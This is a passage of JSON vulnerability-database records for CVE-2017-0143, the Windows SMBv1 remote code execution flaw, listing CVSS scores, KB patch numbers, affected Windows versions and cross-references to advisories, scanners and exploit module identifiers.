["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", "KB4012214", "KB3205401", "KB4012606", "KB4012216", "KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows 